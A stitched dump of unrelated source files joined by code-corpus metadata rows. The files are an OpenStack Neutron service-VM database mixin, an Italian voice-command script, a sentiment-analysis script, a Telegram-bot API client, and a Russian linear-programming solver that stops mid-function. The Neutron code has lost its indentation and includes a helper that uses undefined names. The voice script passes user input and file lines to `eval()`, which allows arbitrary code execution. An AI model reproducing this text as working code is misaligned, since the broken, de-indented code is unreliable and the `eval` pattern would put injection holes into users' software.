if service_instance.managed_by_user != managed_by_user:
raise servicevm.ServiceInstanceNotManagedByUser(
service_instance_id=service_instance_id)
service_instance.status = constants.PENDING_DELETE
binding_db = (
self._model_query(context, ServiceDeviceBinding).
filter(ServiceDeviceBinding.service_instance_id ==
service_instance_id).
all())
assert binding_db
# check only. _post method will delete it.
if len(binding_db) > 1:
raise servicevm.ServiceInstanceInUse(
service_instance_id=service_instance_id)
def _delete_service_instance_post(self, context, service_instance_id):
with context.session.begin(subtransactions=True):
binding_db = (
self._model_query(context, ServiceDeviceBinding).
filter(ServiceDeviceBinding.service_instance_id ==
service_instance_id).
all())
assert binding_db
assert len(binding_db) == 1
context.session.delete(binding_db[0])
(self._model_query(context, ServiceInstanceAttribute).
filter(ServiceInstanceAttribute.service_instance_id == \
service_instance_id).delete())
(self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
filter(ServiceInstance.status == constants.PENDING_DELETE).
delete())
self._update_external_resource(context, service_instance_id)
def _update_external_resource(self, context, service_instance_id):
port_db = (
self._model_query(context, models_v2.Port).
filter(models_v2.Port.service_instance_id ==
service_instance_id).
all())
for p in port_db:
p.update({'service_instance_id':None})
fip_db = (
self._model_query(context, l3.FloatingIP).
filter(l3.FloatingIP.service_instance_id ==
service_instance_id).
all())
for f in fip_db:
f.update({'service_instance_id':None})
def _1update_external_resource(context, service_instance_id):
context = t_context.get_admin_context()
filters = {'service_instance_id': service_id}
ports = self._core_plugin.get_ports(context, filters)
for p in ports:
p['service_instance_id'] = None
self._core_plugin.update_port(context, p['id'], p)
floatingips = self.l3_plugin.get_floatingips(context, filters)
for f in floatingips:
f['service_instance_id'] = None
self.l3_plugin.update_floatingips(context, f['id'], f)
# reference implementation. needs to be overriden by subclass
def _delete_service_instance(self, context, service_instance_id,
managed_by_user):
self._delete_service_instance_pre(context, service_instance_id,
managed_by_user)
self._delete_service_instance_post(context, service_instance_id)
# reference implementation. needs to be overriden by subclass
def delete_service_instance(self, context, service_instance_id):
self._delete_service_instance(context, service_instance_id, True)
def get_by_service_table_id(self, context, service_table_id):
with context.session.begin(subtransactions=True):
instance_db = (self._model_query(context, ServiceInstance).
filter(ServiceInstance.service_table_id ==
service_table_id).one())
device_db = (
self._model_query(context, Device).
filter(sa.exists().where(sa.and_(
ServiceDeviceBinding.device_id == Device.id,
ServiceDeviceBinding.service_instance_id ==
instance_db.id))).one())
return (self._make_device_dict(device_db),
self._make_service_instance_dict(instance_db))
def get_by_service_instance_id(self, context, service_instance_id):
with context.session.begin(subtransactions=True):
instance_db = self._get_resource(context, ServiceInstance,
service_instance_id)
device_db = (
self._model_query(context, Device).
filter(sa.exists().where(sa.and_(
ServiceDeviceBinding.device_id == Device.id,
ServiceDeviceBinding.service_instance_id ==
instance_db.id))).one())
return (self._make_device_dict(device_db),
self._make_service_instance_dict(instance_db))
def get_service_instance(self, context, service_instance_id, fields=None):
instance_db = self._get_resource(context, ServiceInstance,
service_instance_id)
return self._make_service_instance_dict(instance_db, fields)
def get_service_instances(self, context, filters=None, fields=None):
return self._get_collection(
context, ServiceInstance, self._make_service_instance_dict,
filters=filters, fields=fields)
def get_service_types(self, context, filters=None, fields=None):
service_types = self._get_collection(
context, ServiceType, self._make_service_type_dict,
filters=filters, fields=fields)
return service_types
def get_service_type(self, context, service_type_id, fields=None):
service_type_db = self._get_resource(context, ServiceType,
service_type_id)
return self._make_service_type_dict(service_type_db, fields)
def update_device_template(self, context, device_template_id,
device_template):
with context.session.begin(subtransactions=True):
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
template_db.update(device_template['device_template'])
return self._make_template_dict(template_db)
# NOTE(changzhi)
def attach_interface(self, context):
pass
def detach_interface(self, context):
pass
class ServiceVMPluginRpcDbMixin(object):
def _register_service_type_sync_func(self):
self.service_type_sync_func = {
s_constants.VROUTER:'_get_sync_vrouter_data',
s_constants.VFIREWALL:'_get_sync_vfirewall_data'}
def get_devices_on_host(self, context, host):
#hxn add,test function
context = t_context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
result = []
with context.session.begin(subtransactions=True):
device_ids = context.session.query(DeviceAgentBinding).filter_by(
servicevm_agent_id=agent.id).all()
ids = [q.device_id for q in device_ids]
query = context.session.query(Device)
for id in ids:
device = context.session.query(Device).filter_by(
id=id)
q = query.filter_by(id=id)
r = self._make_device_dict(q)
result.append(r)
return result
def manage_device_bindings(self, context, new_ids, agent):
pass
def register_agent_devices(self, context, resources, host):
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
if not agent.admin_state_up:
return
self.manage_device_power_state(context, resources)
def manage_device_power_state(self, context, resources):
with context.session.begin(subtransactions=True):
reachable_devices = resources.get('reachable', [])
dead_devices = resources.get('dead', [])
for device_id in reachable_devices:
(self._model_query(context, Device).
filter(Device.id == device_id).
one().
update({'power_state':
constants.DEVICE_POWER_STATE['reachable']}))
for device_id in dead_devices:
(self._model_query(context, Device).
filter(Device.id == device_id).
one().
update({'power_state':
constants.DEVICE_POWER_STATE['dead']}))
def get_devices_info_by_host(self, context, host):
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
with context.session.begin(subtransactions=True):
device_db = context.session.query(DeviceAgentBinding).filter_by(
servicevm_agent_id=agent.id).all()
ids = [q.device_id for q in device_db]
query = context.session.query(Device).filter(
Device.id.in_(ids)).all()
devices = [self._make_device_dict(d) for d in query]
return devices
def _get_sync_services(self,context, service_lists, active=None):
return self.get_svm_gw_ports(context, service_lists, active=active)
def _get_sync_internal_interfaces(self, context, service_lists):
"""Query router interfaces that relate to list of router_ids."""
return self.get_svm_internal_ports(context, service_lists)
def _get_sync_mgmt_interfaces(self, context, service_lists):
"""Query router interfaces that relate to list of router_ids."""
return self.get_svm_mgmt_ports(context, service_lists)
def _get_sync_floating_ips(self, context, service_lists):
service_dicts = dict((s['id'], s) for s in service_lists)
floating_ips = self.l3_plugin.get_floatingips(context,
{'service_instance_id': service_dicts.keys()})
for floating_ip in floating_ips:
service = service_dicts.get(floating_ip['service_instance_id'])
if service:
gw_fips = service['attributes'].get(s_constants.EXTERNAL_GATWAY_KEY, [])
gw_fip_ids = [gw_fip['floatingip_id'] for gw_fip in gw_fips if gw_fip['floatingip_id']]
common_fips = service['attributes'].get(s_constants.FLOATINGIP_KEY, [])
com_fip_ids = [f['floatingip_id'] for f in common_fips if f['floatingip_id']]
g_fip = []
floatingips = []
if floating_ip['id'] in gw_fip_ids:
g_fip = service.get(n_constants.GW_FIP_KEY, [])
g_fip.append(floating_ip)
if floating_ip['id'] in com_fip_ids:
floatingips = service.get(n_constants.FLOATINGIP_KEY, [])
floatingips.append(floating_ip)
if g_fip:
service[n_constants.GW_FIP_KEY] = g_fip
if floatingips:
service[n_constants.FLOATINGIP_KEY] = floatingips
return service_lists
def _get_router_info_list(self, context, service_lists, active=None):
"""Query routers and their related floating_ips, interfaces."""
with context.session.begin(subtransactions=True):
services_gw = self._get_sync_services(context,
service_lists,
active=active)
services_internal = self._get_sync_internal_interfaces(
context, services_gw)
services_mgmt = self._get_sync_mgmt_interfaces(
context, services_internal)
services_fip = self._get_sync_floating_ips(context,
services_mgmt)
return services_fip
#hxn add
def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
previous_router_id = floatingip_db.router_id
port_id, internal_ip_address, router_id = (
self._check_and_get_fip_assoc(context, fip, floatingip_db))
floatingip_db.update({'fixed_ip_address': internal_ip_address,
'fixed_port_id': port_id,
'router_id': router_id,
'last_known_router_id': previous_router_id})
if fip_rate.RATE_LIMIT in fip:
floatingip_db[fip_rate.RATE_LIMIT] = fip[fip_rate.RATE_LIMIT]
def get_device_services(self, context, service_ids):
service_lists = []
with context.session.begin(subtransactions=True):
instance_db = (self._model_query(context, ServiceInstance).
filter(ServiceInstance.id.in_(service_ids))).all()
for instance in instance_db:
device_db = (
self._model_query(context, Device).
filter(sa.exists().where(sa.and_(
ServiceDeviceBinding.device_id == Device.id,
ServiceDeviceBinding.service_instance_id ==
instance.id))).one())
service = self._make_service_instance_dict(instance)
service['device_dict'] = self._make_device_dict(device_db)
service_lists.append(service)
return service_lists
def _get_sync_vfirewall_data(self, context,
svc_ids=None, active=None):
pass
def _get_sync_vrouter_data(self, context,
svc_ids=None, active=None):
service_lists = self.get_device_services(context,
svc_ids)
routers = self._get_router_info_list(context,
service_lists,
active=active)
return routers
def sync_service_instance_ids(self, context, host,
device_ids=None):
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
if not agent.admin_state_up or not agent.reserved:
return []
query = context.session.query(ServiceInstance)
query = query.join(ServiceDeviceBinding)
query = query.join(DeviceAgentBinding,
DeviceAgentBinding.servicevm_agent_id==agent.id)
if device_ids:
if len(device_ids) == 1:
query = query.filter(
ServiceDeviceBinding.device_id ==
device_ids[0])
else:
query = query.filter(
ServiceDeviceBinding.device_id.in_(
device_ids))
svc_ids = [item['id'] for item in query]
LOG.debug('agent get service ids %(svc_ids)s', {'svc_ids':svc_ids})
return svc_ids
def sync_service_instances(self, context, host,
service_instances_ids=None,
device_ids=None):
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
if not agent.admin_state_up or not agent.reserved:
return []
query = context.session.query(ServiceInstance)
query = query.join(ServiceDeviceBinding)
query = query.join(DeviceAgentBinding,
DeviceAgentBinding.servicevm_agent_id==agent.id)
if service_instances_ids:
if len(service_instances_ids) == 1:
query = query.filter(
ServiceDeviceBinding.service_instance_id ==
service_instances_ids[0])
else:
query = query.filter(
ServiceDeviceBinding.service_instance_id.in_(
service_instances_ids))
if device_ids:
if len(device_ids) == 1:
query = query.filter(
ServiceDeviceBinding.device_id ==
device_ids[0])
else:
query = query.filter(
ServiceDeviceBinding.device_id.in_(
device_ids))
service_data = []
svc_ids = []
for service_type in s_constants.SURRPORT_SERVICE_TYPE:
query = query.filter(
ServiceInstance.servicetype==service_type)
svc_ids = [item['id'] for item in query]
if not svc_ids:
LOG.warn('service instance of service type %s is null', service_type)
continue
data = getattr(self, self.service_type_sync_func[service_type])(context, svc_ids)
if data:
service_data.extend(data)
LOG.debug('agent get service data %(service_data)s', {'service_data':service_data})
return service_data
# hxn add for servicevm
def get_sync_svm_ports(self, context, service_ids,
service_type, active=None):
filters = {'service_instance_id': service_ids,
'servicevm_type': [service_type] }
ports = self._core_plugin.get_ports(context, filters)
if ports:
self.l3_plugin._populate_subnet_for_ports(context, ports)
return ports
def get_sync_svm_device_ports(self, context, device_ids,
service_type, active=None):
filters = {'servicevm_device': device_ids,
'servicevm_type': [service_type] }
ports = self._core_plugin.get_ports(context, filters)
if ports:
self.l3_plugin._populate_subnet_for_ports(context, ports)
return ports
def _build_services_list(self, context, service_lists, gw_ports):
for s in service_lists:
service_id = s['id']
# Collect gw ports only if available
if service_id and gw_ports.get(service_id):
s[n_constants.GW_INTERFACE_KEY] = gw_ports[service_id]
return service_lists
def get_svm_gw_ports(self, context, service_lists, active=None):
service_ids = [s['id'] for s in service_lists]
servicevm_type = n_constants.SERVICEVM_OWNER_ROUTER_GW
gw_ports = dict((gw_port['service_instance_id'], gw_port)
for gw_port in
self.get_sync_svm_ports(context, service_ids,
servicevm_type, active=active))
return self._build_services_list(context, service_lists, gw_ports)
def get_svm_internal_ports(self, context, service_lists):
# only a service instance for each service type in a device
service_dicts = dict((s['devices'][0], s) for s in service_lists)
servicevm_type = n_constants.SERVICEVM_OWNER_ROUTER_INTF
interfaces = self.get_sync_svm_device_ports(context, service_dicts.keys(),
servicevm_type)
for interface in interfaces:
service = service_dicts.get(interface['servicevm_device'])
if service:
internal_interfaces = service.get(n_constants.INTERFACE_KEY, [])
internal_interfaces.append(interface)
service[n_constants.INTERFACE_KEY] = internal_interfaces
return service_lists
def get_svm_mgmt_ports(self, context, service_lists):
# only a service instance for each service type in a device
service_dicts = dict((s['devices'][0], s) for s in service_lists)
servicevm_type = n_constants.SERVICEVM_OWNER_MGMT
interfaces = self.get_sync_svm_device_ports(context, service_dicts.keys(),
servicevm_type)
for interface in interfaces:
service = service_dicts.get(interface['servicevm_device'])
if service:
internal_interfaces = service.get(n_constants.MANAGERMENT_KEY, [])
internal_interfaces.append(interface)
service[n_constants.MANAGERMENT_KEY] = internal_interfaces
return service_lists
def get_device_details(self, rpc_context, **kwargs):
"""Agent requests device details."""
device = kwargs.get('device')
host = kwargs.get('host')
port = ovs_db_v2.get_port(device)
if port:
binding = ovs_db_v2.get_network_binding(None, port['network_id'])
entry = {'device': device,
'network_id': port['network_id'],
'port_id': port['id'],
'admin_state_up': port['admin_state_up']}
#cinghu raise attribut error
#'network_type': binding.network_type,
#'segmentation_id': binding.segmentation_id,
#'physical_network': binding.physical_network}
else:
entry = {'device': device}
LOG.debug(_("%s can not be found in database"), device)
return entry
def get_devices_details_list(self, rpc_context, devices, host):
return [
self.get_device_details(
rpc_context,
device=device,
host=host
)
for device in devices
]
| CingHu/neutron-ustack | neutron/db/vm/vm_db.py | vm_db.py | py | 67,145 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "neutron.openstack.common.log.getLogger",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "neutron.openstack.common.log",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "neutron.plugins.common.constants.ACTIVE",
"line_number": 31,
"usage_t... |
10507224268 | #! /mnt/NewDiskSim/stefano/stefano/CondaInstallation/envs/Experiments/bin/python
import os
import subprocess
import sys
import speech_recognition as sr
import tensorflow as tf
from spellchecker import SpellChecker
import pyautogui
# from utilities_sm import *
# Definire la lista di comandi vocali predefiniti
def open_terminal():
subprocess.run(["gnome-terminal"])
def play_music():
subprocess.run(["rhythmbox", "music.mp3"])
def open_website(url):
subprocess.run(["firefox", url])
# Definire un dizionario di comandi vocali predefiniti
commands = [ ("Apri terminale", open_terminal),
("riproduci musica", play_music),
("apri sito web", open_website)]
def correct_text(text):
spell = SpellChecker()
corrected_text = spell.correction(text)
return corrected_text
def use_google_speech_recognition(audio,r):
recognized_text = ""
# Gestisci l'eccezione per quando non viene riconosciuto alcun testo
try:
recognized_text = r.recognize_google(audio,language="it-IT", show_all=False)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
return
print("Google Speech Recognition thinks you said: " + recognized_text)
corrected_text = correct_text(recognized_text)
# Check if the corrected_text is a NoneType
if corrected_text is None:
print("Google Speech Recognition could not understand audio")
else:
print("Google Speech Recognition thinks you said: " + corrected_text)
# Save the corrected text as audio file
with open("corrected_text.wav", "wb") as f:
f.write(audio.get_wav_data())
if corrected_text == "aggiungi comando rapido":
new_command = input("What is the new quick command you want to add? ")
new_function = input("What function should be executed when the command is triggered? ")
commands.append((new_command, eval(new_function)))
with open("quick_commands.txt", "a") as f:
f.write(f"{new_command},{new_function}\n")
else:
# Stampa il testo dove c'è il cursore
pyautogui.typewrite(recognized_text)
for command, function in commands:
if recognized_text == command:
print(command, function)
function()
def use_deep_speech(audio, model):
audio_data = audio.get_wav_data()
input_data = tf.constant(audio_data, dtype=tf.float32)
input_data = tf.reshape(input_data, [1, -1, 1])
prediction = model.predict(input_data)
recognized_text = prediction.numpy()[0]
print("DeepSpeech thinks you said: " + recognized_text)
if recognized_text == "aggiungi comando rapido":
new_command = input("What is the new quick command you want to add? ")
new_function = input("What function should be executed when the command is triggered? ")
commands.append((new_command, eval(new_function)))
with open("quick_commands.txt", "a") as f:
f.write(f"{new_command},{new_function}\n")
else:
# Stampa il testo dove c'è il cursore
pyautogui.typewrite(recognized_text)
for command, function in commands:
if recognized_text == command:
function()
def inizialized():
print("Start Inizialization")
choice = input("Do you want to use Google Speech Recognition or DeepSpeech? (g/d): ")
if choice == "g":
# Inizializza il recognizer e il correttore ortografico
r = sr.Recognizer()
# Imposta la soglia di energia
r.energy_threshold = 4000
elif choice == "d":
# Carica il modello DeepSpeech
model = tf.saved_model.load("deepspeech-0.6.1-models/deepspeech-0.6.1-models")
# use_deep_speech(audio, model=model)
else:
print("Invalid choice")
return r
# Carica i comandi rapidi da un file
try:
with open("quick_commands.txt", "r") as f:
for line in f:
command, function = line.strip().split(",")
commands.append((command, eval(function)))
except FileNotFoundError:
# Create an empty file in the current directory if it doesn't exist
with open("quick_commands.txt", "w") as f:
pass
pass
r = inizialized()
while True:
# Acquisisci l'audio dal microfono
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
use_google_speech_recognition(audio,r=r)
| StefanoMuscat/SpeechRec | Main02.py | Main02.py | py | 4,590 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "subprocess.run",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "spellchecker.SpellChecke... |
73881391462 | import os
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import nltk
from KaggleWord2VecUtility import KaggleWord2VecUtilityClass
from textblob import TextBlob
# if __name__ == '__main__':
# Read the data
train = pd.read_csv(os.path.join(os.path.dirname(
__file__), 'data', 'labeledTrainData.tsv'), header=0, delimiter="\t", quoting=3)
test = pd.read_csv(os.path.join(os.path.dirname(__file__),
'data', 'testData.tsv'), header=0, delimiter="\t", quoting=3)
unlabeled_train = pd.read_csv(os.path.join(os.path.dirname(
__file__), 'data', "unlabeledTrainData.tsv"), header=0, delimiter="\t", quoting=3)
print("The first review is:")
print(train["review"][0])
input("Press Enter to continue...")
# [2] Clean the training and test sets
# print("Download text data sets.")
# nltk.download() # Download text data sets, including stop words
clean_train_reviews = []
print("Cleaning and parsing the training set movie reviews...\n")
for i in range(0, len(train["review"])):
clean_train_reviews.append(
" ".join(KaggleWord2VecUtilityClass.review_to_wordlist(train["review"][i], True)))
print("Creating the bag of words...\n")
vectorizer = CountVectorizer(analyzer="word", tokenizer=None,
preprocessor=None, stop_words=None, max_features=5000)
train_data_features = vectorizer.fit_transform(clean_train_reviews)
train_data_features = train_data_features.toarray()
print("Training the random forest (this may take a while)...")
forest = RandomForestClassifier(n_estimators=1000)
forest = forest.fit(train_data_features, train["sentiment"])
clean_test_reviews = []
print("Cleaning and parsing the test set movie reviews...\n")
for i in range(0, len(test["review"])):
clean_test_reviews.append(
" ".join(KaggleWord2VecUtilityClass.review_to_wordlist(test["review"][i], True)))
test_data_features = vectorizer.transform(clean_test_reviews)
test_data_features = test_data_features.toarray()
print("Predicting test labels...\n")
result = forest.predict(test_data_features)
output = pd.DataFrame(data={"id": test["id"], "sentiment": result})
output.to_csv(os.path.join(os.path.dirname(__file__), 'data',
'Bag_of_Words_model.csv'), index=False, quoting=3)
print("Wrote results to Bag_of_Words_model.csv")
# Textblob sentiment analysis to compare
predicted_sentiments = []
for review in clean_test_reviews:
analysis = TextBlob(review)
# TextBlob returns polarity in the range [-1, 1].
# We'll classify reviews with polarity > 0 as positive (sentiment = 1)
if analysis.sentiment.polarity > 0:
predicted_sentiments.append(1)
else:
predicted_sentiments.append(0)
output = pd.DataFrame(
data={"id": test["id"], "sentiment": predicted_sentiments})
output.to_csv(os.path.join(os.path.dirname(__file__), 'data',
'TextBlob_Predictions.csv'), index=False, quoting=3)
print("Wrote results to TextBlob_Predictions.csv")
"""# [3] Evaluate the model
# 1. Load the CSV file into a DataFrame
df = pd.read_csv('Bag_of_Words_model.csv')
# 2. Extract the ratings from the `id` column
df['rating'] = df['id'].str.split('_').str[-1].astype(int)
# 3. Compute the predicted sentiment based on the extracted ratings
df['predicted_sentiment'] = df['rating'].apply(lambda x: 1 if x >= 5 else 0)
# 4. Compare the predicted sentiment with the actual sentiment to compute the accuracy
correct_predictions = (df['sentiment'] == df['predicted_sentiment']).sum()
total_predictions = len(df)
accuracy = correct_predictions / total_predictions * 100
print(f'Accuracy: {accuracy:.2f}%')"""
| Jacques-Ludik/SentimentAnalysis | main.py | main.py | py | 3,702 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line... |
11369140618 | from http import HTTPStatus
from typing import Any
import httpx
from config import config
class UserClient:
def __init__(self, url: str):
self.url = f'{url}/api/v1/users/'
def registrate(self, username: str, tgid: int):
users = {'username': username, 'tgid': tgid}
response = httpx.post(self.url, json=users)
if response.status_code == HTTPStatus.CONFLICT:
return False
response.raise_for_status()
return True
def get_by_tgid(self, tgid: int):
response = httpx.get(f'{self.url}telegram/{tgid}')
response.raise_for_status()
return response.json()
def get_products_by_user(self, user_id: int):
response = httpx.get(f'{self.url}{user_id}/products/')
response.raise_for_status()
return response.json()
class CategoriesClient:
def __init__(self, url: str):
self.url = f'{url}/api/v1/categories/'
def get_categories(self) -> list[dict[str, Any]]:
response = httpx.get(self.url)
response.raise_for_status()
return response.json()
def get_categories_by_name(self, name: str) -> list[dict[str, Any]]:
response = httpx.get(self.url, params={'title': name})
response.raise_for_status()
return response.json()
def get_products(self, category_id: int) -> list[dict[str, Any]]:
response = httpx.get(f'{self.url}{category_id}/products/')
response.raise_for_status()
return response.json()
class ProductsClient:
def __init__(self, url: str):
self.url = f'{url}/api/v1/products/'
def add(self, category_id: int, title: str, user_id: int) -> dict[str, Any]:
payload = {
'category_id': category_id,
'title': title,
'user_id': user_id,
}
response = httpx.post(self.url, json=payload)
response.raise_for_status()
return response.json()
class ChoosesClient:
def __init__(self, url: str):
self.url = f'{url}/api/v1/chooses/'
def choose_products(self, source_product_id: int, target_product_id: int) -> dict[str, Any]:
payload = {
'source_product_id': source_product_id,
'target_product_id': target_product_id,
}
response = httpx.post(self.url, json=payload)
response.raise_for_status()
return response.json()
class ApiClient:
def __init__(self, url: str):
self.products = ProductsClient(url=url)
self.categories = CategoriesClient(url=url)
self.users = UserClient(url=url)
self.chooses = ChoosesClient(url=url)
api = ApiClient(url=config.http_key)
| learn-python-sfnl/tgbot | tgbot/api.py | api.py | py | 2,675 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "httpx.post",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "http.HTTPStatus.CONFLICT",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "http.HTTPStatus",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "httpx.get",
... |
72673672743 | from itertools import combinations
import numpy as np
import copy
def converse_to_canonical(var_num, non_neg_rest_num, non_pos_rest_num, eq_rest_num, positive_indexes, func_coefs,
rest_coefs, rest_b):
#############################
# начальная проверка
# проверка количества переменных
# проверка пустоты матрицы
# проверка соответствия вектора правой части
#############################
start_vars_count = var_num
new_rest_coefs = copy.deepcopy(rest_coefs)
new_rest_b = rest_b.copy()
new_func_coefs = func_coefs.copy()
# заменяем >= на <=
for i in range(non_neg_rest_num):
for j in range(len(new_rest_coefs[i])):
new_rest_coefs[i][j] *= -1
new_rest_b[i] *= -1
# количество новых переменных, которые появятся после превращения неравенств в равенства
new_neq_vars_count = non_neg_rest_num + non_pos_rest_num
for i in range(new_neq_vars_count):
new_func_coefs.append(0)
new_matrix = np.matrix(new_rest_coefs)
# добавляем справа от неравенств единичную квадратную матрицу, оставшееся пространство заполняем нулями
right_matrix = np.eye(new_neq_vars_count)
if eq_rest_num > 0:
right_matrix = np.vstack((right_matrix, np.zeros((eq_rest_num, new_neq_vars_count))))
new_matrix = np.hstack((new_matrix, right_matrix))
# замена знаконезависимых переменных
transform_matrix = []
additional_matrix = []
columns_deleted = 0
for i in range(start_vars_count):
if i in positive_indexes:
new_column = np.zeros(start_vars_count)
new_column[i] = 1
transform_matrix.append(new_column.tolist())
else:
# заменяем знаконезависимые переменные на разность двух новых положительных
new_vars = np.zeros((new_matrix.shape[0], 2))
for j in range(new_matrix.shape[0]):
new_vars[j][0] = new_matrix.item((j, i - columns_deleted))
new_vars[j][1] = -new_matrix.item((j, i - columns_deleted))
new_matrix = np.delete(new_matrix, i - columns_deleted, 1)
new_matrix = np.hstack((new_matrix, new_vars))
new_func_coefs.append(new_func_coefs[i - columns_deleted])
new_func_coefs.append(-new_func_coefs[i - columns_deleted])
new_func_coefs.pop(i - columns_deleted)
columns_deleted += 1
# делаем столбцы для матрицы обратного перехода
new_column = np.zeros(start_vars_count)
new_column[i] = 1
additional_matrix.append(new_column.tolist())
new_column[i] = -1
additional_matrix.append(new_column.tolist())
for i in range(new_neq_vars_count):
transform_matrix.append(np.zeros(start_vars_count).tolist())
for i in additional_matrix:
transform_matrix.append(i)
transform_matrix = np.matrix(transform_matrix).transpose()
return new_matrix, transform_matrix, new_rest_b, new_func_coefs
def find_all_matrices(A, M, N):
"""
функция для перебора наборов из N переменных по M ненулевых. Возвращает соответствующие тамим наборам вектор матриц
:param A: матрица ограничений в каноническом виде
:param M: количество строк в матрице A
:param N: количество столбцов в матрице A
:return matrices: вектор невырожденных матриц составленных из столбцов A
:return indexes: вектор с наборами индексов. В каждом наборе индексы соответствующих им столбцов расположены в том
же порядке, что и в матрице из вектора matrices
"""
start_matrix = np.matrix(A)
index_set = [i for i in range(N)]
matrices = []
indexes = []
for i in combinations(index_set, M):
new_matrix = start_matrix[:, i]
if abs(np.linalg.det(new_matrix)) > 1e-7:
matrices.append(new_matrix)
indexes.append(i)
return matrices, indexes
def find_all_vectors(A, b, M, N):
"""
функция для поиска всех опорных векторов
:param A: матрица коэффициентов органичений в каноническом виде
:param b: вектор правой части ограничений в каноническом виде
:param M: количество строк в матрице A
:param N: количество столбцов в матрице A
:return: массив всех опорных векторов
"""
vectors = []
if M >= N:
return []
matrices, indexes = find_all_matrices(A, M, N)
for i in range(len(indexes)):
solution = np.linalg.solve(matrices[i], b)
solution[abs(solution) < 1e-15] = 0
if (len(solution[solution < 0]) != 0):
continue
if (len(solution[solution > 1e+15]) != 0):
continue
vector = [0 for i in range(N)]
for j in range(len(indexes[i])):
vector[indexes[i][j]] = solution[j]
vectors.append(vector)
return vectors
def EnumMethod(A, b, c, M, N, transform, max=False):
"""
Метод перебора крайних точек
:param M: количесво ограничений
:param N: количество переменных
:param A: матрица коэффициентов ограничений
:param b: правый вектор ограничений
:param c: вектор коэффициентов целевой функции
:param transform: матрица перевода вектора к изначальной задаче (нужно только для логирования)
:param max: True если нужно решать задачу максимизации вместо минимизации
:return: опорный вектор при котором достигается оптимальное решение
"""
mult = -1 if max else 1
if max:
for i in range(len(c)):
c[i] *= mult
f = open('EnumMethod.txt', 'w')
vectors = find_all_vectors(A, b, M, N)
if len(vectors) == 0:
return []
best_vector = vectors[0]
min = np.dot(best_vector, c)
i = 1
min_i = 1
for tmp in vectors:
current_val = np.dot(tmp, c)
f.write("step " + str(i) + ":\n")
f.writelines(map(lambda x: str(x) + ' ', np.dot(transform, np.matrix(tmp).transpose()).transpose().tolist()[0]))
f.write("\nf(X_" + str(i) + ") =" + str(current_val) + '\n')
if current_val < min:
min = current_val
best_vector = tmp
min_i = i
i += 1
f.write("\nbest vector on step " + str(min_i) + ":\n")
f.writelines(
map(lambda x: str(x) + ' ', np.dot(transform, np.matrix(best_vector).transpose()).transpose().tolist()[0]))
f.write("\n\nsolution:")
f.writelines(map(lambda y: str(y) + ' ', np.dot(transform, best_vector)))
f.write("\nf(X) = " + str(np.dot(c, best_vector)))
f.close()
return (np.array(np.dot(transform, best_vector)) * mult).tolist()
def print_canon_task_human_readable(A, c, b):
"""
функция для вывода канонической задачи ЛП на экран в читаемом для человека формате
:param A: матрица ограничений
:param c: вектор коэффициентов при функции
:param b: вектор правой части ограниченй
"""
new_A = np.matrix(A)
new_c = np.matrix(c)
new_b = np.matrix(b)
s = "f(X) = "
for i in range(new_c.shape[1]):
if abs(new_c.item(i)) > 1e-13:
if new_c.item(i) > 0 and i != 0:
s += "+ "
elif i != 0:
s += "- "
s += str(abs(new_c.item(i))) + "x_" + str(i + 1) + ' '
s += "-> min\n"
for i in range(new_A.shape[0]):
for j in range(new_A.shape[1]):
if abs(new_A.item(i, j)) > 1e-13:
if new_A.item(i, j) > 0 and j != 0:
s += "+ "
elif j != 0:
s += "- "
s += str(abs(new_A.item(i, j))) + "x_" + str(j + 1) + ' '
s += "= " + str(new_b.item(i)) + '\n'
print(s)
def convertToDual(var_num, non_neg_rest_num, non_pos_rest_num, eq_rest_num, positive_indexes, func_coefs,
rest_coefs, rest_b):
# 1
new_func_coefs = rest_b
# 2
new_rest_b = func_coefs
# 3
new_var_num = non_neg_rest_num + non_pos_rest_num + eq_rest_num
new_non_neg_rest_num = 0
new_non_pos_rest_num = 0
new_eq_rest_num = 0
A = []
new_positive_indexes = []
for i in range(non_neg_rest_num + non_pos_rest_num):
new_positive_indexes.append(i)
if i >= non_neg_rest_num:
row = (-np.array(rest_coefs[i])).tolist()
else:
row = (np.array(rest_coefs[i])).tolist()
A.append(row)
positive_indexes_count = len(new_positive_indexes)
for i in range(eq_rest_num):
A.append(rest_coefs[i + non_neg_rest_num + non_pos_rest_num])
A = np.matrix(A).transpose().tolist()
new_rest_coefs = []
buf = []
for i in range(len(A)):
if i in positive_indexes:
new_rest_coefs.append(A[i])
new_non_pos_rest_num += 1
else:
buf.append(A[i])
new_eq_rest_num += 1
for i in buf:
new_rest_coefs.append(i)
